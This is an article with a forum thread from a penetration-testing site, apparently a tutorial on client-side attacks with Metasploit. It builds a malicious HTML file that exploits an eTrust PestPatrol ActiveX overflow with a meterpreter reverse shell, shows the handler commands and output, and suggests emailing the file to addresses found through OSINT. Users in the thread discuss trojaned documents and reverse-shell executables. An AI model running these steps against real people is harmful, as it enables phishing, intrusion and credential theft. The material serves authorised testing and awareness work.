Video: Client-Sides, Social Engineering and Metasploit, Oh My!

phishing.jpg

It should be obvious to everyone that the bad guys are moving away from network level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page.  This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website.  Your mileage may very on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of “normal” or “non-malicious” type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm,  as well as others.

**This isn’t to say that some fileformat exploits can’t be delivered via the web.  You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user’s inbox. So let’s take a quick look at how this can be accomplished.

For our example we’ll use a vulnerability in the ActiveX control for eTrust PestScan.  Because this control is not marked safe for scripting, it wont run if a user browses to the page in the internet zone. But if they open a .html file that calls the vulnerable control we can execute code.

http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb

From the description in the module:

“This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.”

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$

Platform: Windows

Privileged: No

License: Metasploit Framework License

Provided by:
MC


Available targets:

Id Name

— —-

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


Basic options:

Name Current Setting Required Description

—- ————— ——– ———–

FILENAME MSF no The file name.


Payload information:

Space: 1024

Avoid: 1 characters

Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When

sending an overly long string to the Initialize() property of

ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary

code. This control is not marked safe for scripting, so choose your

attack vector accordingly.

References:
http://www.w00t-shell.net/#

http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options


Module options:

Name Current Setting Required Description
—- ————— ——– ———–

FILENAME MSF no The file name.

Exploit target:

Id Name

— —-

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html

msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(etrust_pestscan) > set LHOST 192.168.0.101

LHOST => 192.168.0.101

msf exploit(etrust_pestscan) > show options


Module options:


Name Current Setting Required Description

—- ————— ——– ———–

FILENAME DEMO.html no The file name.


Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description

—- ————— ——– ———–
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.0.101 yes The local address

LPORT 4444 yes The local port

Exploit target:

Id Name

— —-

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler

[*] Creating HTML file …

[*] File is located in ./data/exploits/ …

msf exploit(etrust_pestscan) >

Fileformat bugs are going to require you to run the multi/handler, so you can catch the return shells.

cg@attack:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================

Mode Description

—- ———–

(H)elp You’re looking at it baby!

(S)ummary Show information about this module

(O)ptions Show available options for this module

(A)dvanced Show available advanced options for this module

(I)DS Evasion Show available ids evasion options for this module

(P)ayloads Show available payloads for this module

(T)argets Show available targets for this exploit module

(AC)tions Show available actions for this auxiliary module

(C)heck Run the check routine of the selected module

(E)xecute Execute the selected module

cg@attack:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler

[*] Starting the payload handler…

Or  …

	./msfconsole msf >msf > use exploit/multi/handlermsf exploithandle
	r) > setExitOnSessionfalsemsf exploit(handler) > setPAYLOAD window
	s/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.0
	.101msf exploit(handler) > set LPORT 4444

*** This is where you or another member of your pen testing team would work their social engineering magic to get the client to open the html file. Money mouth

 

[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage…

[*] Uploading DLL (73227 bytes)…

[*] Upload completed.

[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >

And now onto the video (another example of malicious pdfs in action) …

Video is in the process of moving to our YouTube Channel

Conclusion

With a combination of user interaction and the power of metasploit, we were able to grab password hashes. From here a jolt of 0phcrack, some rainbow tables, or pass the hash action and we’re off to completing our network pen test goals. This is a perfect example of electronically assisted social engineering, and how it can be a very effective addition to your toolset.

Extra Resources

fileformat exploit videolan_tivo.rb metasploit backtrack http://vimeo.com/2419131 **hard to see

 

Author Bio

EH-Net - Gates - WeirdAAL - Author PicChris Gates, Sr Security Engineer, has been breaking things professionally for over a decade via Network & Web Application Penetration Testing, Red Teaming & Adversarial Simulation. These days Chris splits his time being both a breaker and fixer. Chris is the author of Metta, a tool for adversarial simulation and contributes to other open source projects. In the past he has spoken at the United States Military Academy, BlackHat, DefCon, Wild West Hacking Fest, Toorcon, Brucon, Troopers, SOURCE Boston, Derbycon, LasCon, HashDays, HackCon, Bsides ATL, IT Defense, OWASP AppSec DC, and Devops Days. Chris is also a cofounder of NoVAHackers. Blog: carnal0wnage.attackresearch.com Twitter: @carnal0wnage Talks: https://www.slideshare.net/chrisgates/

All Articles by Chris Gates

Tags:

This topic contains 23 replies, has 7 voices, and was last updated by  KrisTeason 10 years, 4 months ago.

  • Author
    Posts
  • #3276
     Don Donzal 
    Keymaster

    More hacking goodness from Mr. Gates!!

    Permanent link: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

    By Chris Gates, CISSP, GCIH, C|EH, CPTS

    It should be obvious to everyone that the bad guys are moving away from network level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client side exploitation during your pentests.

    A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page.  This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website.  Your mileage may very on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of “normal” or “non-malicious” type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm,  as well as others.

    **This isn’t to say that some fileformat exploits can’t be delivered via the web.  You can easily link to http://www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user’s inbox. So let’s take a quick look at how this can be accomplished.

    Don

    • This topic was modified 1 year ago by  Don Donzal.
  • #21738
     apollo 
    Participant

    Great examples and video 🙂  I was playing with this stuff the other day with the office macros in Metasploit.  It seemed to be quite effective.  It’s amazing what folks will click on with a good backstory.

  • #21739
     RoleReversal 
    Participant

    Nice work Chris, thanks 😀

    (looks like the vimeo link has gone walkies though…)

  • #21740
     KrisTeason 
    Participant

    Like your other videos as well as this one, I’ve got to say nice work. It’s a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I’d sure like your trunk by the way, 327 Exploits I only have 288 (I think…)

  • #21741
     Anonymous 
    Participant

    thanks guys!

    I’ll be releasing a few more client-side/fileformat videos in March as part of my client-side talk at SOURCE Boston, I’ll make sure i post on EH.net when i do.

  • #21742
     mtgarden 
    Participant

    Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?

  • #21743
     KrisTeason 
    Participant

    You mean like binding the PDF with an existing PDF? I’m thinking that you can, but what would be the point, once the malicious pdf opens, doesn’t it just freeze up anyway?

  • #21744
     mtgarden 
    Participant

    Not sure.  Was in the process of setting up a test environment to explore this threat vector.

  • #21745
     Anonymous 
    Participant

    @mtgarden wrote:

    Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?

    not currently that i am aware of

  • #21746
     mtgarden 
    Participant

    Thanks. I was testing this for a presentation but Symantec actually catches it.  So, am trying the vbscript attack. 

    Sadly, there is a quirk with either Metasploit or BT3.  Not sure which yet.  When I run the /msfcli multi/handler PAYLOAD= LHOST= etc…, it runs the exploit and binds to IP=0.0.0.0 which is less than helpful. 

    Heh, I guess there was no reason to assume this would be that easy.  ;D

  • #21747
     Anonymous 
    Participant

    make sure that the IP you’re listening on is the one you add as LHOST and is actually active.

    for example:

    msf exploit(handler) > set LHOST 192.168.1.1
    LHOST => 192.168.1.1
    msf exploit(handler) > exploit

    [*] Handler binding to LHOST 192.168.1.1
    [-] Bind failed on 192.168.1.1
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    ^C[-] Exploit failed:
    [*] Exploit completed, but no session was created.
    msf exploit(handler) > set LHOST 10.10.10.15
    LHOST => 10.10.10.15
    msf exploit(handler) > exploit

    [*] Handler binding to LHOST 10.10.10.15
    [*] Started reverse handler
    [*] Starting the payload handler…

    tested with 3.3-dev

  • #21748
     mtgarden 
    Participant

    Well, my VM has an IP of 192.168.1.1.  So I added LHOST=192.168.1.1 to the exploit.

    Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E

    It doesn’t give me a “bind failed” error, it just binds to 0.0.0.0.

    This happens in a BT3 VM and on a BT3 laptop install.  Would I look for the error/problem in BT3 or in Metasploit 3.2?

  • #21749
     KrisTeason 
    Participant

    Mine also binds to 0.0.0.0 as well but when testing this out. I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit on my msfconsole, it said 0.0.0.0 however once i executed my .exe i recieved my reverse shell.

  • #21750
     mtgarden 
    Participant

    OK.  Then the problem lies in my malicious VB script.  Will have to figure out how to fix that one.

    Thanks.

  • #21751
     Don Donzal 
    Keymaster

    Submitted to digg. Click the link below and vote:

    http://digg.com/security/Video_Client_Sides_Social_Engineering_Metasploit_Oh_My

    Please help spread the word,
    Don

  • #21752
     mtgarden 
    Participant

    OK.  Solved my issues.  Well some of them anyway…. ::)

    My setup was this: BT3 VM with bridged networking.  The trojaned .doc file was executed on the host Office suite.  That failed.  But, if I operated the exploit from a foreign system, it worked fine.

    In fact it worked so well, I demoed it in a security presentation.  Scared some users (as well it should).  Very cool.

    Anyone know where I can read up on these less well documented exploit techniques?  This isn’t in the default manual.

    Thanks.

  • #21753
     Anonymous 
    Participant

    this looked to be the best place for this.

    Just added a module for ms09_002 to the MSF trunk. enjoy.

    http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ms09_002_memory_corruption.rb

    /dean

  • #21754
     Feras 
    Participant

    This exploit work on my B|T4 but on windows !

    C:Program FilesMetasploitFramework3msf32msf32modulesexploitswindowsbrowser

    add the exploit name ms09_002_memory_corruption.rb

    msf > use exploit/windows/browser/ms09_002_memory_corruption
    [-] Failed to load module: exploit/windows/browser/ms09_002_memory_corruption

    i’m sure about the local … and its not included when i show the exploits in my msf .. :-/

    any idea ?

  • #21755
     mtgarden 
    Participant

    Bite the bullet and switch to Linux.  I’m not sure why Moore and company waste time on the WIndows version as it is just a shadow of the msfconsole.  Generally, when that stuff happened on Windows, I uninstalled and reinstalled and it would fix it.

  • #21756
     Feras 
    Participant

    LOL , buddy its not about moveing from windows to linux .. am linxer but sometimes some tools wont work on linux .. otherwise i like to use windows sometimes ..

    and without windows u wont be here 😉 its start the shadow ..

    but anyway your way to fix errors not rigth .. u need to figure out whats the problem then fix it …

    any idea ?

  • #21757
     mtgarden 
    Participant

    Did you try uninstalling and reinstalling?  When the MS08_067 exploit arrived, the update function would not pull everything properly.  Or it wasn’t registering things correctly.  This happened to several friends.  The fastest fix I found was to uninstall and reinstall the app.

    And sorry, didn’t mean to sound mean about the Window’s thing.  I just gave up the windows version the other day.  I tried to make it work until I wanted to practice backrounding a session and routing through it.  It just doesn’t work properly in Windows.  That’s all.  I have found the WIndows interface to be buggy.

  • #21758
     Feras 
    Participant

    your rigth but did u think Moore make all this for windows and after that we should to reinstall it and install it again ..

    anyway am going now to google it more and more till i found some way …

    in the end i’ll try your help ..

    thanks alot buddy !

  • #21759
     Feras 
    Participant

    its look some Error from Metasploit Certificate …

    Updating the Metasploit Framework…
    Error validating server certificate for ‘https://metasploit.com:443′:
    – The certificate is not issued by a trusted authority. Use the
    fingerprint to validate the certificate manually!
    Certificate information:
    – Hostname: metasploit.com
    – Valid: from Mon, 02 Apr 2007 06:02:24 GMT until Fri, 02 Apr 2010 06:02:24 GMT

    – Issuer: 07969287, http://certificates.godaddy.com/repository, GoDaddy.com, In
    c., Scottsdale, Arizona, US
    – Fingerprint: 20:a7:2e:df:6d:53:10:6c:dc:2a:ca:33:fd:35:76:2c:0e:62:b1:4d
    (R)eject, accept (t)emporarily or accept (p)ermanently? yes
    svn: OPTIONS of ‘https://metasploit.com/svn/framework3/branches/framework-3.2′:
    Server certificate verification failed: issuer is not trusted (https://metasploi
    t.com)
    Press any key to continue . . .

  • #21760
     KrisTeason 
    Participant

    Its’ prompting you to type in r, t or p & you  typed in yes, attempt t next time and let us know.

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?